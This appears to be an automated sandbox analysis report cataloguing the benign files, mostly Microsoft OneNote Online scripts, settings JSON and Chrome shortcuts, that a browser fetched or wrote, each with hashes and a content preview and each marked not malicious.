                                                                                      Preview:L..................F.@.. ...$+.,.........&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VXY7a...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 11:09:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2681
                                                                                      Entropy (8bit):3.9922148389244265
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:C94E4E86E3A8768FD04BBDD447121E16
                                                                                      SHA1:C9243B68E89EFC013B26707D5D42358D4F801194
                                                                                      SHA-256:ADCFB0644CAC2DBBBAD1BE438064411E5882BDA815AEF9C63D0F76AC3AD3F023
                                                                                      SHA-512:9D186A2E7EE38BE48E5589D471AB5C36D99C610141800B9EEAD78C4080CD1B3D09BFFB16EBDD8EADFB14FE97F05B68911B58E7087B73D9359875F2AE54479042
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.@.. ...$+.,........&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VXY7a...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 11:09:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2683
                                                                                      Entropy (8bit):4.001526414960453
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:982781B6CCD18DDB3366C6E818B6C0FB
                                                                                      SHA1:71C1BA6F34952AFECB5C421867F125E53B47BB3A
                                                                                      SHA-256:E096DE35C91041AAFB43A51D7287FDFB496ACBA391BFE4A1BFC2B0420E97414D
                                                                                      SHA-512:6DB5C544C2B657EDCE07993E042F8689D08110337960BDB1861D524123BB367D9679DB02C946918BB662C871E76C55597B7B28ADDB5D2DDED9BCA7CCEE0BAF86
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.@.. ...$+.,....N...&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VXY7a...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (5949), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):5949
                                                                                      Entropy (8bit):5.021760613857532
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BBF6A2B6E77972F0718F99C86AE3FE92
                                                                                      SHA1:806E8C002AE178B41819BEAFE123AE09202DF966
                                                                                      SHA-256:78FF6158246E4FA25F994827F90ED69FEEF349AA57449CB404E35C3026BD4B8A
                                                                                      SHA-512:4B4F58735190254E74ED9BAF547046642F622EE35414784A093356D28982A28A5D84E4CE71E476A88BC43583B6BB2D916B16A733D67D5B30E145DC2E4182BC8C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/h78FF6158246E4FA2_App_Scripts/CompatParentElementFix.js
                                                                                      Preview:function __loadCompat(n){n.Debug=function(){};n.Debug._fail=function(n){throw new Error(n);};n.Debug.writeln=function(n){window.console&&window.console.debug(n)};n.__getNonTextNode=function(n){try{while(n&&n.nodeType!=1)n=n.parentNode}catch(t){n=null}return n}}function _loadSafariCompat(){Node.prototype.__defineGetter__("text",function(){return this.textContent});Node.prototype.__defineSetter__("text",function(n){this.textContent=n});Node.prototype.selectNodes=function(n){var t=this.ownerDocument;return selectNodes(t,n,this)};Node.prototype.selectSingleNode=function(n){var t=this.ownerDocument;return selectSingleNode(t,n,this)};Document.prototype.selectNodes=function(n){return selectNodes(this,n,this.documentElement)};Document.prototype.selectSingleNode=function(n){return selectSingleNode(this,n,this.documentElement)}}function _loadMozillaCompat(n){n.navigate=function(n){window.setTimeout('window.location = "'+n+'";',0)};var t=function(n,t){t._mozillaEventHandler=function(n){return win
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (38617), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):38617
                                                                                      Entropy (8bit):4.892203561984488
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:FE1E3F510D9B8C6F79E1E5E52362BC6E
                                                                                      SHA1:5E3B968543A37E7AD3AA50B2536420DEE762C069
                                                                                      SHA-256:82C1D484D2DD8CC012FC9DED6FE545E4D83C6232337038B1A57BCEDEEFF70193
                                                                                      SHA-512:5CA94E3421E76CBB09BA4AF4A13FD79ABD22A43B148662AF9A1DC6585860B0BA9BF4E34D285BBAEFD7016C42D47045CBC0AD2BD8970D10BD1F5ABD1357A06BFA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Type.registerNamespace("OneNoteIntl");OneNoteIntl.OneNoteStrings=function(){};OneNoteIntl.OneNoteStrings.registerClass("OneNoteIntl.OneNoteStrings");OneNoteIntl.OneNoteStrings.L_CloudFilesUploadSuccess="Successfully Uploaded : {0}";OneNoteIntl.OneNoteStrings.L_CloudFilesUploadFailed="Error Uploading : {0}";OneNoteIntl.OneNoteStrings.L_ContextMenuSmartLookup="Search";OneNoteIntl.OneNoteStrings.L_ContextMenuTextSmartLookup='Search "{0}"';OneNoteIntl.OneNoteStrings.L_BrowseVersions="Page Versions";OneNoteIntl.OneNoteStrings.L_Camera="Camera";OneNoteIntl.OneNoteStrings.L_CopyNotebook="Copy Notebook";OneNoteIntl.OneNoteStrings.L_HierarchySyncErrorMessage="The new experimental sync feature has experienced an error and your change may not be saved.";OneNoteIntl.OneNoteStrings.L_HierarchySyncErrorRefreshMessage="Please click here or refresh the webpage to resolve the issue.";OneNoteIntl.OneNoteStrings.L_CopyToCloudDescription="Edit and view this notebook on all your devices";OneNoteIntl.OneNot
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):73679
                                                                                      Entropy (8bit):5.345331273160561
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:65F960810895837B06B1D3AE1CCEAEF3
                                                                                      SHA1:0673F80A70CFB78AD7018E161E3201E80CB71307
                                                                                      SHA-256:F452E6287DAFD3B632CBFF8533ED5DFC2F6F476C8672B468CF6DCFE321B8C889
                                                                                      SHA-512:1DB287677E77DF1E62326486EEDA54DAB20A760008180ED93D905029B6361BA06212F62DD366E77435F43F701CC9BBE1DC46234C6201173B75336BA79A41DF26
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var oteljs_agave=function(e){var t={};function n(i){if(t[i])return t[i].exports;var r=t[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:i})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(n.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(i,r,function(t){return e[t]}.bind(null,r));return i},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=31)}([function(e,t,n){"use strict";Object.defineProperty(t,"__esModule
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (31803)
                                                                                      Category:dropped
                                                                                      Size (bytes):31842
                                                                                      Entropy (8bit):5.341705273940054
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:6470A918BA1FD4B8D0882DF0269DDB82
                                                                                      SHA1:97814FDAB64AA7D1B30F082F9EB272D4B1CE18A2
                                                                                      SHA-256:FD4CE12A87594281AFCEE9C73A40FE7ACC282BCC9E764FBB3AFA1481A96A091E
                                                                                      SHA-512:B8CB57985DBC03601BFC924EDADFEF62195A6BFDDA8543A08F565FDBB339ACEA3CFFE7DC4D4547D3F134965EBC9E39A3ACBA8E0635CCDD5F4D88F14BE72C163D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).axios=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function r(e,t,r){return t&&n(e.prototype,t),r&&n(e,r),Object.defineProperty(e,"prototype",{writable:!1}),e}function o(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(nul
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1208
                                                                                      Entropy (8bit):5.4647615085670616
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D29FA9F2AB3A72F2608E8E82C8C3D1C6
                                                                                      SHA1:8B21CC06752837B4B6B8FEF8D54F50EB2C7CCA8F
                                                                                      SHA-256:E1B0A10649C4B92F828523EFC2EBE135EA9488179A2816888D1E84F786202DBF
                                                                                      SHA-512:824A207E3F5AF4934B7B50FE5E3F8585FAECA571C3C39E510C06DC8FBDF3E64B07811CAAE06239936BDDDDFA4C90E534F03C0DA8147AF9294042DEA6B0FBCB94
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>500 - Internal server error.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:downloaded
                                                                                      Size (bytes):3795
                                                                                      Entropy (8bit):4.384774100737571
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:13A96D45E8F678BAC100CFFE9610F047
                                                                                      SHA1:E9A245A2CE1A5B70137AE23FC6EEE3C7F6C25944
                                                                                      SHA-256:E2B4883B2C79928E940202FACF0AF3674A0801EC7F378FC321A4088879E4D746
                                                                                      SHA-512:00842B5359DCD5701469669E0CA344D3087AAFA32A5B9484D07DCD3FFB14142810E20F9D71369BE298DB3CAEBD012EF40258001727F16864BA8C10A19B62BCBB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://onenote.officeapps.live.com/o/AppSettingsHandler.ashx?app=OneNote&usid=2db48cbe-d2be-d768-b94d-74e9bbceb453&build=
                                                                                      Preview:{"timestamp":1729771824218,"BootstrapperUlsHeartBeatIsEnabled":false,"EnableCommonHostDiagnosticsParams":true,"ShouldLogJsApiKpisForWord":true,"EnableFramePageErrorReportingForWord":false,"EnableWordSessionRefreshTelemetry":false,"EnableWordSessionRefreshLoggingCleanup":false,"BootstrapperSettingsFetchPeriod":60000,"BootstrapperUlsHeartbeatIntervalMs":5000,"BootstrapperMaxUlsHeartbeatTime":600000,"BootstrapperNoCompleteWarning1Time":120000,"BootstrapperNoCompleteWarning2Time":180000,"BootstrapperUlsUploadCadenceMs":60000,"WordRefreshTelemetryExpirationInDays":7,"RequestedCallThrottlingDefaultToViewMinimumValue":"Major","RemoteUlsETag":"C78C301AFEA9348D5ECE9A0B93BE4D1DAB74B6B1","RemoteUlsSuppressions":"378069,1671813,2208151,2209344,3249545,3290144,4273285,4285850,4298965,4298968,4298969,4751696,5018275,5306497,5904476,6375195,6572226,6948167,7463498,8194017,8458642,17044289,17085210,17085216,17162522,17358857,17387682,19214611,19243470,19707039,19743902,19939648,20486158,21627712,21631
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (337), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):4577
                                                                                      Entropy (8bit):5.4929583420973565
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A72F31E94CAB68999A7E522F25CAAE32
                                                                                      SHA1:004C0800C3683B22C15C997E7FC09B8B0FF895B7
                                                                                      SHA-256:66D8C20B8A57C7AD0318B7B2120422B0517A6C684462CD90F5BF70F135C48661
                                                                                      SHA-512:211F19983D575AFF6CDA9C5819A89988F5AAE010BFE93B5DFE1DEE3D9FD2195A77E507FF568ECC17FD82B6214B9FE76BCA1F488345885B9F3FDBD3E27B735B92
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://oauth.officeapps.live.com/oa/WacOAuth.aspx?replyUrl=https://onenote.officeapps.live.com&usid=2db48cbe-d2be-d768-b94d-74e9bbceb453&WacUserType=WOPI&sv=1&msalv3=1
                                                                                      Preview:....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">....<html xmlns="http://www.w3.org/1999/xhtml">...<head><title>....</title>....<style id="sharedauthstyles" nonce="7b4917b1-6abd-4316-b032-e9c8da894710"></style>....<script type="text/javascript" nonce="59da20b1-2a0b-40ab-90fc-7a65ec722064">.....function loadBackupScript() {......var backupScript = document.createElement('script');......backupScript.setAttribute("data-allowedapps", "5a4eed13-c4c4-4b4c-9506-334ab200bf31;93d53678-613d-4013-afc1-62e9e444a0a5");......backupScript.setAttribute("data-allowedaudiences", "e03a13ee-9730-4cae-8525-47559c8cf18a;https://augloop.office.com/v2;394866fc-eedb-4f01-8536-3ff84b16be2a;liveprofilecard.access;https://shredder-us.osi.office.net/;https://substrate.office.com;https://consentservice.microsoft.com/web;https://consentservice.microsoft.com/checkin;");......backupScript.setAttribute("data-origin", "https://onenote.officeapps
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (57788)
                                                                                      Category:dropped
                                                                                      Size (bytes):57831
                                                                                      Entropy (8bit):5.310477756021743
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BC93B7FD04F68A94312B547CEF297451
                                                                                      SHA1:59EA29125AD34035D985DA7C32668D1570BA2FE0
                                                                                      SHA-256:E55ED51D4941518F0B995EDF3557D3845DB5B91E0EA9F7BA771DC14A312871A1
                                                                                      SHA-512:D9BFC87D2B458952707FE509190762B064263F61051A16068DCFE67F3FA7E5A39FC69B8F0D4CF035763EF7E563EBE92464A63E988BEB3991765142C41738C9DF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var wacBoot;!function(){"use strict";var e,t,i={},n={};function s(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return i[e](o,o.exports,s),o.exports}s.m=i,s.d=function(e,t){for(var i in t)s.o(t,i)&&!s.o(e,i)&&Object.defineProperty(e,i,{enumerable:!0,get:t[i]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce((function(t,i){return s.f[i](e,t),t}),[]))},s.u=function(e){return"pasLogger.min.js"},s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),s.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},e={},t="wacBoot:",s.l=function(i,n,o,a){if(e[i])e[i].push(n);else{var r,l;if(void 0!==o)for(var c=document.getElementsByTagName("script"),d=0;d<c.length;d++){var u=c[d];if(u.getAttribute("src")==i||u.getAttribute("data-webpack")==t+o){r=u;break}}r||(l=!0,(r=document.createElement("script")).charset="utf-8",r.timeout=120,s.nc&&r.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):351959
                                                                                      Entropy (8bit):5.473926445319263
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:6D65897ADB16447C6CA38DF7EF5C62F3
                                                                                      SHA1:527058146A95BAD856D5FF78238568507BFCC185
                                                                                      SHA-256:B82EC4FEBA0212A5367C85FDA50406BE8B014826E7826251FBE79AFF398B7566
                                                                                      SHA-512:5F74593312AE970CBE06B50AEF5CF96034AD8693DC2B40EBB37DDD5544EB9CDF78421773FD63B304EDC8BBEAE881BF3CC1D87F6097FA0013D8125F17C09C12B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function _define_property(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t}function _object_spread(t){for(var e=1;e<arguments.length;e++){var i=null!=arguments[e]?arguments[e]:{},n=Object.keys(i);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(i).filter((function(t){return Object.getOwnPropertyDescriptor(i,t).enumerable})))),n.forEach((function(e){_define_property(t,e,i[e])}))}return t}function ownKeys(t,e){var i=Object.keys(t);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(t);e&&(n=n.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),i.push.apply(i,n)}return i}function _object_spread_props(t,e){return e=null!=e?e:{},Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(e)):ownKeys(Object(e)).forEach((function(i){Object.defineProperty(t,i,Object.getOwnPropertyDescriptor(e,i))})),t}(globalThis.onenote
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                      Category:dropped
                                                                                      Size (bytes):7886
                                                                                      Entropy (8bit):3.675002721266739
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:7A7A4890CAAA77025E1B33A6D6E474EE
                                                                                      SHA1:DC735B99D9EF0C76B4A7AEAE8BAA4CBD9551BA77
                                                                                      SHA-256:9E1DA5BF715135491519A188CAD977DB6CBA414071E2407B69D63221379D8802
                                                                                      SHA-512:291692981A555857F95A3378B511E27B60154B95EA0BA0452B3A5536D9A63A16B00518066E4F4B60E6A73CBD2A7C46B99A18102EA5970989B9736E57A6474D30
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d....w...w...w...w...w...w...w..................................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d....w...w...w...w...w...w...w..................................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d....w...w...w...w...w...w...w..................................P...P...P...P...P...P...P...P...T...d...d...d...d...d...d...d...d....w...w...w...w...w...w...w..................................H...H...H...H...H...H...H...H...H...\...d...d...d...d...d...d...d....w...w...w...w...w...w...w...........
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):144348
                                                                                      Entropy (8bit):5.370495033348894
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9747CFD352DC4A728F7197577D939A01
                                                                                      SHA1:A86856D0FB47046A9578FBCF1B3F4846684C10FF
                                                                                      SHA-256:776C63720217ABF62AB3945E9AD5FD66C97CEBB88F5A2AD225867B85D9BA08F3
                                                                                      SHA-512:701F414F67BEFDF8B109561302FB726286DEBB854F334FC211DAA22E539F9DEB97323D3342E8C139D0DCC645A256737489C834F5E39158897616EE7D62642975
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/wise/owl/onenote-boot.9dad85753ad10c8adae2.js
                                                                                      Preview:var Microsoft="object"==typeof Microsoft?Microsoft:{};Microsoft.Office=Microsoft.Office||{},Microsoft.Office.OneNote=function(t){var e={};function i(s){if(e[s])return e[s].exports;var o=e[s]={i:s,l:!1,exports:{}};return t[s].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=t,i.c=e,i.d=function(t,e,s){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:s})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},i.t=function(t,e){if(1&e&&(t=i(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var s=Object.create(null);if(i.r(s),Object.defineProperty(s,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)i.d(s,o,function(e){return t[e]}.bind(null,o));return s},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnPro
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (60197)
                                                                                      Category:dropped
                                                                                      Size (bytes):60238
                                                                                      Entropy (8bit):5.399771208271399
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:E01FFDF881BE6EE55465D981D9A932CF
                                                                                      SHA1:D30134C757C94DB9D8F18EFEB14432DA60468D39
                                                                                      SHA-256:563FBA440CB645E242FE821A24B50E6F5D26CA248765E29DAFC2EDCA7299410E
                                                                                      SHA-512:6F8FEAB537CFFF463FE0017F1467CE8BABF8BEF374BC3D6EC32F1E1FCCA22116AC3B72A583F4A832490C3900849973CB279D784486002923D699873C98109590
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:"use strict";function _define_property(e,t,i){return t in e?Object.defineProperty(e,t,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[t]=i,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var i=null!=arguments[t]?arguments[t]:{},n=Object.keys(i);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(i).filter((function(e){return Object.getOwnPropertyDescriptor(i,e).enumerable})))),n.forEach((function(t){_define_property(e,t,i[t])}))}return e}(globalThis.onenoteOnlineChunks=globalThis.onenoteOnlineChunks||[]).push([[658],{81221:function(e,t){var i;Object.defineProperty(t,"__esModule",{value:!0}),(i=t._BondDataType||(t._BondDataType={}))[i._BT_STOP=0]="_BT_STOP",i[i._BT_STOP_BASE=1]="_BT_STOP_BASE",i[i._BT_BOOL=2]="_BT_BOOL",i[i._BT_DOUBLE=8]="_BT_DOUBLE",i[i._BT_STRING=9]="_BT_STRING",i[i._BT_STRUCT=10]="_BT_STRUCT",i[i._BT_LIST=11]="_BT_LIST",i[i._BT_MAP=13]="_BT_MAP",i[i._BT_INT32=16]="_BT_INT32",i[i._BT_INT64=17]="_BT_INT64"},
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:downloaded
                                                                                      Size (bytes):2374
                                                                                      Entropy (8bit):5.160218881033882
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BC37636DB83AD0CF7D7FEF34D060EBDF
                                                                                      SHA1:EF0020804B3A08871B8158130A9E74433C607EE2
                                                                                      SHA-256:999A9E6CE76DE70BD8E46F052D3119F82EAE0CC4EA9AFAA8F790326DAC4C797F
                                                                                      SHA-512:D0356F3431B77CEB761B353D4C77EB5324BFE6624E8C097AAA80AAC9763CB3A57737E4E76696678D10026A3FCCAC32B5BC5DA59DF346E97F48454897336790D3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://admin.microsoft.com/admin/api/uxversion?bldVer=v1
